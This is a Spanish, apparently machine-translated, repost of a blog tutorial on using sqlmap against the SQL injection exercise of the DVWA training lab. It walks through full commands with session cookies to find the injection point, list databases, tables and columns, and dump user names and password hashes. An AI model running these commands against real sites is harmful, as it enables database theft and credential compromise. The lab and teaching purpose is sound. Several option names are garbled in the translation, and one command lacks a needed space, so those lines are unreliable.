[notas del estudio] novatos cinco minutos experiencia rápida sqlmap

Este artículo no se complica la introducción, los detalles no introducen directamente en la operación. Para más detalles, consulte la sqlmap explicar .

Descripción: a la práctica antes de la operación, se supone que ya ha construido un buen conjunto de DVWA u otros entornos de prueba.

Plataforma de Pruebas: Kali Linux sistema operativo

blanco de prueba: OWASP BWA plataforma DVWA de inyección SQL

Herramientas utilizadas: Tamper Data

Navegador: Firefox

A continuación se enumeran los parámetros utilizados para la experiencia, Opción Descripción

Los parámetros utilizados en la prueba
-u Para especificar la inyección de URL
--dbs Enumerar todos los datos del sistema de gestión de base de datos
-RE Para especificar el nombre de la base de datos enumerado (por lo general después --dbs get)
--mesas La enumeración que especifica la base de datos (con la opción -D) Todo tabla
-T Para especificar el nombre de la enumeración de mesa (--tables después)
--columns Enumera la lista de nombres
--tugurio Dump vuelto inject
Galleta Página de la inyección de galletas
-C Especificar la lista de nombres de campo enumerado

En particular, el papel de la operación específica tabla específica.

1, para detectar la existencia de la vulnerabilidad de inyección de página.

Sabotaje de datos abierta en la barra de menú de herramientas del navegador Firefox, que son libres de entrar un valor de "AA" en el ID de usuario, la información de sabotaje captura de datos HTTP, sólo los valores de cookie, derecho de copia.

En la entrada de comando en el terminal sobre:

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31'

La implementación puede tener permiten seleccionar [S / n] por supuesto, terminar con la siguiente información clave

A saber, la existencia del parámetro id en los puntos de inyección SQL URL, respectivamente, basado en el punto de inyección error del punto de inyección y pregunta de la unión, la base de datos también da la información de la versión web y la plataforma.

2, a más de sonda el nombre de base de datos.

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' --dbs

Se añade --dbs parámetros, se detecta la siguiente información

Además del sistema de base de datos MySQL por defecto, hay una base de datos llamada DVWA de.

3, echar un vistazo a lo que algunos de los cuadros

-D parámetro para especificar DVWA base de datos, - tabla de opciones de tablas de enumeración.

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables

Enumerar la tabla: [libro de visitas] y [los usuarios], por supuesto, está más interesado en el contenido de los usuarios.

4, consulte la lista de campo de las tablas de los usuarios

opción -T sobre la base de la etapa anterior para especificar el nombre de la tabla, - columnas enumerar la lista de opciones

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns

Obtener los nombres de campo de tabla y tipos de datos

5. ¿Cuáles son los diversos campos

Uso --dump opción vuelca el contenido del campo y ahorro

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns --dump

Lograr el objetivo

Finalmente obtenido información específica para especificar los campos de la tabla a través de la inyección de SQL, aunque el campo de la contraseña está encriptada, pero durante la ejecución de instrucciones pregunta si el descifrado.

Tal vez no todos los campos que todos queremos, se puede especificar lo que queremos de la columna mediante la opción -C, como aquí sólo de usuario y contraseña

root@kali:~# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; BEEFHOOK=4yvOOc34gzdjDMRAwQrxi7fCkM8TYlQCzghXxWg9JpXe1uOzWyenDDrexJRVEoRtlV56fkadEVKeOwLu; PHPSESSID=un56mfs279tq7o3fb47cn8eie3; JSESSIONID=AA9D7E6D5EC7C1142E41252701BC2E31' -D dvwa --tables -T users --columns  -C user,password--dump

Esto filtrará el contenido del campo de interés.

A ello se suma la plataforma DVWA si el nivel de seguridad está establecido en alto, no se detectará detectar directamente la presencia del punto de inyección SQL.

Publicado 25 artículos originales · ganado elogios 23 · Vistas a 10000 +

Supongo que te gusta

Origin blog.csdn.net/Secur17y/article/details/93338075
Recomendado
Clasificación